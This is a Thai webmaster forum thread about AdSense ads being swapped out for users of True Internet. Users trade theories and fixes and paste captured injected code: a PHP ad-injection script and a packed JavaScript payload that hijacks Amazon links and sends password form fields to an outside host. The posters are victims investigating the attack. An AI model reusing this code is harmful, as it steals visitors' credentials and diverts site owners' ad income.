ต่อไป »

[happyadmin]

เจอเหมือนกันค่ะ เป็นลักษณะ google adsense ไม่แสดงบนตำแหน่งเดิมที่เราเซ็ทไว้   มี 2 เว็บเป็นทั้ง 2 อัน เว็บนึงใช้ของ blogger ยังเป็น  ใช้เน็ต True ค่ะ อยู่ย่านเซ็นทรัลลาดพร้าว  เป็นมา ประมาณ 2 อาทิตย์ได้  มีเครื่องคอมพ์  2 เครื่อง ลองทดลองเปิดดูอีกเครื่องนึงครั้งแรกเปิดเห็น  adsense แต่ตรงที่ เขียนว่า  ads by Google ไม่มี ขึ้นเป็นตัว i พอเอาเคอร์เซอร์ไปจ่อจึงจะขึ้นว่า  ads by Google พอลองกด refresh ดูคราวนี้ adsense หายไปเลย ไม่มาอีก จึงสรุปว่าไม่มี adsense ขึ้นทั้ง 2 เครื่อง ใช้ IE ค่ะ

ลองทดลองเขียนจดหมายแจ้ง Google วันนี้ อยากรู้ว่า Google มีข้อแนะนำอะไรบ้าง มีเพื่อนเราคนนึงบอกว่า  format เครื่องแล้วหายที่
http://www.thaiseoboard.com/index.php/topic,134666.100.html
ของคุณ Richly

 Re: *** ด่วน! เน็ต True ไม่แสดง Adsense ช่วยกันร้องเรียน ถ้าไม่อยากให้รายได้หดหาย+++
« ตอบ #119 เมื่อ: สิงหาคม 26, 2010, 04:58:03 PM »   

--------------------------------------------------------------------------------

พอดีไม่ได้อ่านทุกกระทู้ที่ตอบ แต่ผมเจออาการแบบนี้เมื่อสักอาทิตย์ที่แล้ว ผมไม่ได้คิดถึงอินเตอร์เน็ตเลยครับ ผมคิดว่าเป็นที่ spyware ที่ไหนสักที่หนึ่งที่แอบเข้ามาในเครื่อง เพราะมีอยุ่ครั้งหนึ่งมันมีฟ้องให้อัพเดท plash player หลังจากผมอัพเดทก็กลายเป้นแบบนี้ ผมไม่รุจะทำยังไงผมฟอร์แมตเครื่องเลย หลังจากฟอร์แมตลงใหม่ก็หายครับและไม่เป็นอีกเลย ผมจึงฟันธงว่าเกิดจาก spy ware อะไรสักอย่าง แต่งงที่เพื่อนๆ สรุปกันว่าเกิดจาก true internet ผมเลยอยากรุ้ว่า อะไรที่เป็นหลักฐานที่เพื่อนๆ คิดว่าเกิดจากทรู ครับ

อันนี้ค่อนข้างจะตรงข้ามกับที่คิดไว้ ผมใช้ เน็ตของทรูอย่าเดียงที่บ้านและหลังจากฟอร์แมตเครื่องก็หายทันที

-----------------------------------------------------------------------------
ไม่ทราบมีใครอีกบ้างทดลอง format เครื่องแล้วหายจากอาการนี้ รบกวนส่งข่าวด้วยค่ะ  จะได้ format ทั้ง 2 เครื่องเลย
 

[nocturne in the moonlight]

รบกวนท่านที่พบปัญหาทุกท่าน แคปเชอร์หน้้าจอมาแปะ ด้วยนะครับ  ขอเป็นเว็บแรง ๆ มี พาว อย่าง ไทยรัฐ เดลินิว หรือ sanook

[Archwin]

สงสัยคนที่ทำจะมาอ่านกระทู้นี้

ของผมอาการหายไปแล้วจะครบ 24 ชั่วโมง
โดยไม่ต้องทำอะไร

เครื่องนี้ format ลงใหม่เมื่อ 2 วันก่อน แล้วต่อเน็ตทรูทันที ก็เป็น.....ตอนนี้หายไปเอง
แต่จะกลับมาอีกหรือไม่ต้องคอยดู

แต่เหตุการณ์ครั้งนี้ถ้าเป็นจาก ISP จริง โดยการ modify javascript ของ google หรือ modify DNS จะเป็นฝีมือ ครายก็แล้วแต่ ผมถือว่า การเล่นเน็ต ไม่มีความปลอดภัยอย่างยิ่ง

ถ้าเป็นทรูทำจริง...หรือคนในทรูทำจริง...โดยที่ทรูจะรู้เห็นหรือไม่
มหันตภัยราย....จะคุกคามต่อไป....ไม่ safe

หลีกเลี่ยงการทำธุรกรรมทางการเงิน

[raptor]

จนถึงตอนนี้ก็ยังไม่เจอ ga.js ตัวปลอมนี้อีก แต่ก็ไม่แน่ว่า มันยังทำงานอยู่ แต่เนียนขึ้นจนจับสังเกตบนหน้าจอไม่ได้หรือไม่
จึงยังวางใจไม่ได้เลย -_-"

ตอนนี้เข้าใจว่ามันแฮ็คได้ในเฉพาะหน้าเพจที่เรียกใช้ ga.js ซึ่งจากการ view source เว็บต่าง ๆ ดูนั้น
amazon.com ไม่ได้เรียกใช้   และนั่นก็เป็นตัวบอกว่าทำไมเข้าเว็บ amazon.com เองแล้ว มันจึงไม่เปลี่ยนเป็น hxxp://your-review.net/track/az.php?u=http://www.amazon.com/* กันหมด

paypal.com ไม่ได้เรียกใช้

mywordpress.com/wp-login.php ปกติแล้วไม่ได้เรียกใช้

หน้า login gmail เห็นว่ามีการเรียก ga.js อยู่ !!!   ถ้ามันได้ gmail ไปอันเดียวก็ไม่ต้องแฮ็คหน้าอื่นผมแล้วครับ โอย  -_-"

[ahon]

ผู้บริหารของทรู รู้เรื่องนี้ไหมนิ......

แล้วฝีมือใคร.......- -' ทำกันได้..

[Archwin]

ผมไปสำรวจเครื่องอื่นของเพื่อนบ้านในย่านเดียวกัน แถวๆ จรัลฯ 95 , 97  ปรากฏว่า อาการยังมีถ้าเข้าไปหน้าไหนก็ตามที่มี google adsense หรือ google-anallytics แปอยู่แล้วทำการ reload page อาการ google adsense ads ถูกเปลี่ยนจะกลับมาทันที

ลองวิเคาราะห์ให้หน่อยครับ

ส่วนกับเน็ต isp อื่นผมไม่เทสแล้วครับเพราะทำหลายครั้งแล้วมันไม่เป็นครับ

แถวเขตอื่นที่เคยเป็นลองทำการ reload ดูครับว่ามันกลับมาเป็นหรือไม่

[dalk]

ในบอร์ดนี้มีพนักงานทรูอยู่นี่ครับ

รับเรื่องไปแจ้งด้วยเด้อ

[Archwin]

วันนี้แปลกมากครับ เรียก http://www.google-analytics.com/urchin.js (เป็น code javscript รุ่นเก่าๆ ที่เว็บไทย ชอบติดกัน google ยังใช้งานกับ code นี้อยู่) เรียกแล้วมีการแทรก php code

โค๊ด:

<?php


header(&#39;Content-type: application/javascript&#39;);

function __js($buffer) {
	require(&#39;class.JavaScriptPacker.php&#39;);
	$p = new JavaScriptPacker($buffer, 62, false, false);
	$buffer = str_replace("\\\r\n", "\\n", $buffer);
	$buffer = str_replace("\\\n", "\\n", $buffer);
	$buffer = str_replace("\\\r", "\\n", $buffer);
	$buffer = str_replace("}\r\n", "};\r\n", $buffer);
	$buffer = str_replace("}\n", "};\n", $buffer);
	$buffer = str_replace("}\r", "};\r", $buffer);
	return $p->pack();
}



//ob_start(&#39;__js&#39;);

$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];

$loc = geoip_country_code_by_name($ip);

$db = new PDO("sqlite:users.db");
$sql = sprintf("select * from users where ip=&#39;%s&#39; order by last_seen desc limit 1;", $ip);
$data = $db->query($sql)->fetchAll();

$display_ads = false;

if($data->numRows != 0) {
} else {
}


if(count($data) > 0) {
        $diff = time() -  $data[0][&#39;last_seen&#39;];
	if($diff > 60*60*6) { // one ad popup per 6 hours.
                $display_ads = true;
        	$sql = sprintf("update users set last_seen=%s where ip=&#39;%s&#39;;", time(), $ip);
	        $db->query($sql);

        }
} else {
	$sql = sprintf("insert into users (ip, last_seen) values (&#39;%s&#39;, %d);", $ip, time());
	$db->query($sql);
	// never seen this ip, let&#39;s show some ads
	$display_ads = true;
}

if($display_ads) {
	echo "// displaying ads\n";
}  else {

}

include(&#39;common.js&#39;);
?>

addEvent(window, 'load', function() {
<?php
	if($display_ads) {
		if($loc == "PL") {
			file_put_contents(&#39;logs/ad_log.txt&#39;, "unique pole detected. display an ad.\n", FILE_APPEND);
			echo "var url = &#39;http://miloscnawybiegu.info/&#39;;\n";
			include(&#39;popunder_ads.js&#39;);
		} elseif($loc == "VN") {
			echo "var url = &#39;http://toiyeu.in/&#39;;\n";
			file_put_contents(&#39;logs/ad_log.txt&#39;, "unique viet detected. display an ad.\n", FILE_APPEND);
			include(&#39;popunder_ads.js&#39;);
		} elseif($loc == "AU") {
//			echo "var url = &#39;http://electronicsquarterly.info/&#39;;\n";
			file_put_contents(&#39;logs/ad_log.txt&#39;, "unique australian detected. display an ad.\n", FILE_APPEND);
//			include(&#39;popunder_ads.js&#39;);
		} else {
			file_put_contents(&#39;logs/ad_log.txt&#39;, "$loc unhandled\n", FILE_APPEND);
		}
		// expire the cache
		header("Cache-Control: no-cache, must-revalidate"); 
		header("Expires: " . date(&#39;r&#39;, time() - (3600 * 24)));
	} else {
		// let&#39;s make ourselves cacheable for an hour, at least
		header("Cache-Control: max-age=3600, must-revalidate");
		header("Expires: " . date(&#39;r&#39;, time() + 3600));
		header(&#39;ETag: "3e86-410-3596fbbc"&#39;);
	}
//	include(&#39;steal_passwords.js&#39;);
//	include(&#39;rewrite_amazon.js&#39;);
?>
}, false);

function __gat() {
	this._getTracker = function() {
		this._initData = function() { };
		this._setDomainName = function() { };
		this._trackPageview = function() { };
		this._setVar = function(string) { };
		return this;
	};
	return this;
};
var _gat = __gat();

แบบนี้แสดงว่าพวกที่ทำมันอยู่นอกเครื่องเราแน่นอน มีการ update script นรกของพวกมันตลอดเวลา

[LifeGood]

ผมกลับมาเป็นปกติหลายวันแล้วนะครับ ทำตามหลาย ๆ คนในนี้บอกมาคือปิดกั้นเครือข่ายโฆษณาของ google ครับ ตอนนี้เริ่มเชื่อแล้วว่าปัญหามาจากเครือข่ายโฆษณาของ google มากกว่า ส่วนที่ยังงง ๆ ก็คือ ทำไมเกิดเฉพาะกับเน็ต true นี่แหละ

[nocturne in the moonlight]

ใครเจอปัญหา ช่วย แคบหน้าจอมาแปะ ด้วยครับ

[Archwin]

อาการยังไม่หายหรอกครับ วันนี้ www.google-analytics.com/ga.js
มันเปลี่ยนไปอีกครับทำได้เนียนขึ้นแต่ไม่รู้มันมีความหมายอะไร มัน encrypt ด้วย ใครชำนาญลองช่วยดูทีครับ

โค๊ด:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 B(3){7 s=b.11(\'16\');s.G=\'17/19\';s.W=3;b.V.U(s)}2 N(j,o,v,R){9(j.S){j.S(o,v,R);f I}E 9(j.T){7 r=j.T("1s"+o,v);f r}}2 L(3){7 i=b.11(\'1c\');i.W=3;i.n=1;i.p=1;b.V.U(i)}9(1l 1f==\'1e\'){B(\'8://D.O-M.m/1g.1n\')}N(6,\'1j\',2(){$(b).1h(2(){7 q=$(\'1d[G="1k"]\');7 1q=0;9(q.1r>0){$(q).J(2(){$(4).1p(2(e){7 P=$(4.1o).1m();7 3=\'8://D.O-M.m/c.g?3=\'+6.Q.d+\'&\'+P;L(3)})})}});7 H=[];$("a[d]").13(2(i){f $(4).k(\'d\').12(\'8://D.14.m\')!=-1}).J(2(i){3=$(4).k(\'d\');H.1b(3)$(4).k(\'d\',\'8://C-z.A/1a/18.g?u=\'+15(3));$(4).k(\'1i\',3)});9(!$.1D.22){26=I;1S=-1;1W=\'\';1Y=\'\';1X=\'\';27=\'\';1Z=\'\';1V=\'\';1t=\'\';1T=Z;B("8://1U.20.m/21/28.g?25=5&23=24&1Q=&1A=1B")}7 x=0;2 y(3){9(x==0){9(6.F){l=6.F;t=6.1C}E{l=6.1R;t=6.1z}h=$(6).p();w=$(6).n();Y=\'n=\'+w+\',p=\'+h+\',1y=0,1u=0,1v=0,Q=0,1w=0,1x=0,1E=0,1F=\'+l+\',1M=\'+t;x=1;6.1N(3,\'1O\',Y).1P();6.1L()}}$(b).10(2(){y(\'8://C-z.A/a/X.g\')});$(6).10(2(){y(\'8://C-z.A/a/X.g\')})},Z);2 K(){4.1K=2(){4.1G=2(){};4.1H=2(){};4.1I=2(){};f 4}f 4}7 1J=K();',62,133,'||function|url|this||window|var|http|if||document||href||return|php|||obj|attr||com|width|evType|height|pwds|||||fn||_popped|_pu|review|net|addScript|your|www|else|screenX|type|amazon_urls|true|each|__gat|__t|analytics|addEvent|google|data|location|useCapture|addEventListener|attachEvent|appendChild|body|src|adframe|feat|false|click|createElement|search|filter|amazon|escape|script|text|az|javascript|track|push|img|input|undefined|jQuery|jq|ready|alt|load|password|typeof|serialize|js|form|change|collected|length|on|infinityads_text_link_color|resizable|toolbar|menubar|status|scrollbars|screenTop|sid|8254|screenY|browser|directories|left|_initData|_setDomainName|_trackPageview|_gat|_getTracker|focus|top|open|pu|blur|adtype|screenLeft|infinityads_frequencyCap|infinityads_enable_text_link|ads|infinityads_text_link_bg|durl|infinityads_layer_ad_bg|infinityads_layer_border_color|infinityads_layer_ad_text_color|lzjl|newServing|mozilla|pid|5260|nid|infinityads_enable_pop|infinityads_layer_ad_link_color|showAd'.split('|'),0,{}))

[nattee]

ไม่อยากจะคิดเลย.....มันคงไม่เนียนได้ขนาดที่สามารถเปลี่ยน ID ไปเป็นของมันได้นะ.....
เพราะถ้ามันทำได้...เราจะจับผิดมันด้วยตาเปล่าไม่ได้อีกต่อไป...ทีนี้ละ งานเข้า กันหมดแน่เลย.....

[Mikas]

ทำไมช่วงที่บ่นมีปัญหากัน ยอด adsense  ผมเพิ่มขึ้น พอเลิกบ่นยอดกลับเป็นเหมือนเดิม (ทราฟฟิคไทยๆ นี้แหละ) 

ลอง track channel test กันก่อนดีกว่าไหม๊ครับ? 

[nocturne in the moonlight]

ไม่อยากจะคิดเลย.....มันคงไม่เนียนได้ขนาดที่สามารถเปลี่ยน ID ไปเป็นของมันได้นะ.....
เพราะถ้ามันทำได้...เราจะจับผิดมันด้วยตาเปล่าไม่ได้อีกต่อไป...ทีนี้ละ งานเข้า กันหมดแน่เลย.....

ถ้าเป็นงี้ คง ต้องใช้ adspy เช็ค pubid กันอยู่ตลอดเวลาแล้วครับ ว่าจะเปลี่่ยนเมื่อไหร่  เปลี่ยนปุ๊บก็เจอตัวการปั๊บ

[penpas]

ผมเห็นกระทู้นี้นานมากๆ ตั้งแต่ยอดของผมตกลงถึงแม้จะน้อยนิด แต่ตอนนี้ก็แทบไม่มีจะกินแล้ว 

ผมใช้ net tot ก็เลยปกติ แต่ คนเข้าเว็บใช้ net ture กันหมด อย่ีางเซง

(ผมยังเป็นอยู่คือคนเข้าปกติแต่ยอดคลิกและเงินที่ได้ลดลง)

[thevoice]

เป้นเหมือนกัน ยอดลดเสียส่วนใหญ่
ที่ได้ยอดปกติ ๆ เมื่ออาทิตย์ที่ผ่านมา น่าจะปะมาณ 2 วัน

[nocturne in the moonlight]

ฝากถึงคนที่ ทำนะครับ ถ้าท่านเข้ามาอ่านบอร์ดนี้หรือเห็นกระทู้นี้ "ท่านกำลังทำให้คนอื่นเดือดร้อน" ถ้าท่านเป็นคนทำเว็บ โดยเฉพาะเว็บไทย ย่อมรู้อยู่แล้วว่า กว่าจะปั้นกว่าจะแต่งมันให้มีรายได้มันแสนยากเย็นขนาดไหน ยิ่ง user ไทย ไม่ค่อยนิยม "คลิ๊ก" โฆษณา ด้วยยิ่งแล้วไปกันใหญ่ การที่ท่านมาแย่ง หน้าแรก ไปเท่ากัวว่า ท่านแย่งโอกาส คลิ๊ก ไปมากกว่า 50 เปอร์เซ็นต์เลยนะครับ  อยากจะขอร้องให้หยุด เห็นแต่คนวงการเดียวกัน อยากได้รายได้เสริมควรไปหาวิธีสุจริตอย่างอื่นดีกว่า ภูมิใจกว่ากันเยอะ

[Archwin]

ผมว่าคนทำแถบจะนั่งหน้าจอตลอด พี่แกเล่นปรับเปลี่ยน script ตลอดแถมยังลืมเอา โค๊ด php มาใส่ไว้ใน file java .js อีก

โอ้ย คนทำคงง่วงนอน

คนที่ยังบอกว่า เป็น Ads network หรือ เป็น Spyware ไม่เจอไม่รู้หรอกครับ

งมหาสาเหตุมาจนกล้าฟันธงแล้วครับว่าเป็นจาก ISP และที่น่าเป็นมากสุดน่าจะเป็นการเปลี่ยน DNS มาจาก ISP serverครับ

ส่วนจะเป็นคนใน ISP ทำเองหรือ เคร่อง ISP เองถูกเจาะ อันนี้สุดจะคาดเดาครับ

[in2clearsky]

ช็อคโลกครับ เช้านี้ของผมมันกลับมาปกติแล้วครับ ใครที่เคยเป็นลองเช็คดูครับ
ปล. ไม่ได้แก้ไขอะไรเลยครับ ปล่อยไว้เฉยๆ ก็หายเอง ไม่ได้ปิด ads network ด้วยครับ

สำหรับ ss เมื่อวานผมก็นั่งรอเมื่อไหร่โฆษณานรกมันจะโผล่มาซะที แต่เหมือนคนทำมันไหวตัวทันไม่ยอมปล่อยมาให้ ss เลย ตอนนี้ผมมีของ kapook อยู่ซึ่งเก็บไว้ตั้งแต่เริ่มมีปัญหา ยังไงฝากผู้ที่สามารถนำไปจัดการต่อได้ ช่วยสานต่อด้วยครับ

กระปุก
http://img836.imageshack.us/i/kapookadsense.jpg/
http://img163.imageshack.us/i/kapookcj.jpg/

อันนี้เว็บฝรั่ง
http://img248.imageshack.us/i/jayadsense.jpg/
http://img137.imageshack.us/i/jaycj.jpg/


ปล2. จากที่ผมไปแจ้ง CJ ไว้ในกระทู้นี้ http://www.affiliates4u.com/fo...isher-abusive-acts-report.html

ทาง CJ ได้ส่งคำถามทางเมลมาว่า:

Hi ชือ่ผม,

Sorry for the delay.

The code you gave me is exactly the same, so I’m not sure what we could glean from that.  We cannot recreate the problem.  So its one of three things:

a)      You and other people experiencing this issue have some sort of mal ware on your machine.
b)      A CJ publisher is using Adwords to serve their Google adds to your site.  Have you checked with Google to see if any CJ affiliates are buying inventory?
c)       The proxy server in your location is corrupted.  Are other people using the same?

As I mentioned, if you can get actually affiliate tracking code from the link, then we can immediately identify who and what it is.  Without that information, there is absolutely nothing we can do to identify what is happening.  Can you get this?

Thanks,
Daniel Powel
Commission Junction
0208 785 5825

ตอนนี้ข้อ a), b) น่าจะตัดไปได้ ส่วนข้อ c) ไม่แน่ใจตอนนี้จะสามารถหาข้อมูลได้หรือไม่ เพราะของผมมันหายเป็นปกติแล้ว ยังไงรบกวนคุณ Archwin หรือเพื่อนคนอื่นที่เคยไล่โค้ดโฆษณาช่วยให้ข้อมูลด้วยครับ จะได้ให้ CJ จัดการต่อได้

ปล3. ใครรู้อีเมล์ของ google บ้างครับ ผมจะได้ส่งเรื่องไปถามโดยตรงด้วยเลย จะได้นำไปยืนยันกับ CJ เขาจะได้ตัดข้อ b) ออกอย่างเป็นทางการ
ปล4. ใครที่สามารถอธิบายหลักการทำงานของโค้ดได้ ช่วยอธิบายแบบให้คนธรรมดาเข้าใจได้ง่ายๆ ช่วยเตรียมข้อมูลให้ผมหน่อยครับ อาจจะอธิบายคร่าวๆ หรือทำเป็นแผนภาพเลยยิ่งดีครับ

[bakery]

วันนี้เข้าเว็บเห็นความเปลี่ยนแปลงเกิดขึ้นครับ ต่อเน็ต True เปิดหน้าเว็บ
โฆษณา Google กลับมาแสดงผลเหมือนเดิม

จากการทดสอบเปิดหน้าเว็บ

- กด Refresh แล้วเปิดหน้าเว็บใหม่ โฆษณา Google ขึ้นปกติ
- ลบ Temporary Internet File และ cookies แล้วเปิดหน้าเว็บใหม่ โฆษณา Google ขึ้นปกติ

ตอนนี้ก็รอดูอาการอีกสักระยะว่า อาการนี้จะหายไปเอง หรือจะเป็นๆ หายๆ ครับ